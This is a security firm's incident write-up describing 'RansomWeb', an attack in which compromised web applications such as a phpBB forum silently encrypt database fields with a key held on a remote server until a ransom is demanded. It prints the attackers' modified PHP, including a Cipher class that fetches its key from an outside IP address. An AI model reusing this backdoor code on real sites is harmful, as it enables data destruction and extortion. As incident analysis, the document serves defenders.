High-Tech Bridge's CEO Ilia Kolochenko makes the point that "RansomWeb attacks may cause irreparable damage, as they are very easy to cause and pretty difficult to prevent. The days when hackers were attacking websites for glory or fun are over, now financial profit drives them. The era of web blackmailing and racketeering is about to start."
RansomWeb: emerging website threat that may outshine DDoS, data theft and defacements?
More and more people become victims of ransomware, a malware that encrypts your data and demands money to decrypt them. A new trend on the market shows that cybercriminals will now target your website as well to get a ransom payment from you.
In December 2014, our security experts discovered a very interesting case of a financial company website compromise: the website was out of service displaying a database error, while the website owner got an email asking for a ransom to “decrypt the database”. The web application in question was pretty simple and small, but very important to the company's business - the company could not afford to suspend it, neither to announce its compromise. Careful investigation that we performed revealed the following:
The web application was compromised six months ago, several server scripts were modified to encrypt data before inserting it into the database, and to decrypt after getting data from the database. A sort of “on-fly” patching invisible to web application users.
Only the most critical fields of the database tables were encrypted (probably not to impact web application performance much). All previously existing database records were encrypted accordingly.
The Encryption key was stored on a remote web server accessible only via HTTPS (probably to avoid key interception by various traffic monitoring systems).
During six months, hackers were silently waiting, while backups were being overwritten by the recent versions of the database.
On day X, hackers removed the key from the remote server. The Database became unusable, the website went out of service, and hackers demanded a ransom for the encryption key.
We were sure that it was an individual example of a sophisticated APT targeting a specific company, however last week we faced another similar case. One of our customers, an SMB, was blackmailed after his… phpBB forum went out of order. The forum was used as a main platform for customer support, and therefore was important for the customer.
It was the latest phpBB 3.1.2 released on the 25th of November 2014. No user could login (including forum moderators and admins). The forum was online, however all functions that require forum user to be authenticated didn’t work. Our thorough investigation revealed that forum engine was patched in such a way that users’ passwords and emails were encrypted “on-fly” between the web application and the database.
The following files were modified:
1. File “factory.php” has its “sql_fetchrow()” function modified in such a manner that the result of SQL query “$result = $this->get_driver()->sql_fetchrow($query_id);” in array “result” will have decrypted values of “user_password” and “user_email” table fields:
if(isset($result['user_password'])){
$result['user_password'] = $cipher->decrypt($result['user_password']);
if(isset($result['user_email'])){
$result['user_email'] = $cipher->decrypt($result['user_email']);
2. File “functions_user.php” has a modified version of “user_add” function to add encryption:
$sql_ary = array(
'username'=>$user_row['username'],
'username_clean' => $username_clean,
'user_password' => (isset($user_row['user_password']))?
$cipher->encrypt($user_row['user_password']):$cipher->encrypt(''),
'user_email'=> $cipher->encrypt(strtolower($user_row['user_email'])),
'user_email_hash'=> phpbb_email_hash($user_row['user_email']),
'group_id' => $user_row['group_id'],
'user_type' => $user_row['user_type'],
);
3. File “cp_activate.php” has a modified version of function “main()”:
$sql_ary = array(
'user_actkey' => '',
'user_password' => $cipher->encrypt($user_row['user_newpasswd']),
'user_newpasswd' => '',
'user_login_attempts' => 0,
);
4. File “ucp_profile.php” has a modified version of function “main()”:
if (sizeof($sql_ary))
{
$sql_ary['user_email'] = $cipher->encrypt($sql_ary['user_email']);
$sql_ary['user_password'] = $cipher->encrypt($sql_ary['user_password']);
$sql = 'UPDATE ' . USERS_TABLE . '
SET ' . $db->sql_build_array('UPDATE', $sql_ary) . '
WHERE user_id = ' . $user->data['user_id'];
$db->sql_query($sql);
5. File “config.php” had the following modification:
class Cipher {
private $securekey, $iv;
function __construct($textkey) {
$this->securekey = hash('sha256',$textkey,TRUE);
$this->iv = mcrypt_create_iv(32);
}
function encrypt($input) {
return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, $input, MCRYPT_MODE_ECB, $this->iv));
}
function decrypt($input) {
return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv));
}
}
$key=file_get_contents('https://103.13.120.108/sfdoif89d7sf8d979dfgf/
sdfds90f8d9s0f8d0f89.txt');
$cipher=new Cipher($key);
Moreover, we found two backdoor installation scripts left by hackers on the server that permit to backdoor any phpBB forum with just a couple of clicks. The first installer patches "config.php" file to add "Cipher" class that decrypts and encrypts the data with PHP "mcrypt_encrypt()" function storing the encryption key on a remote server: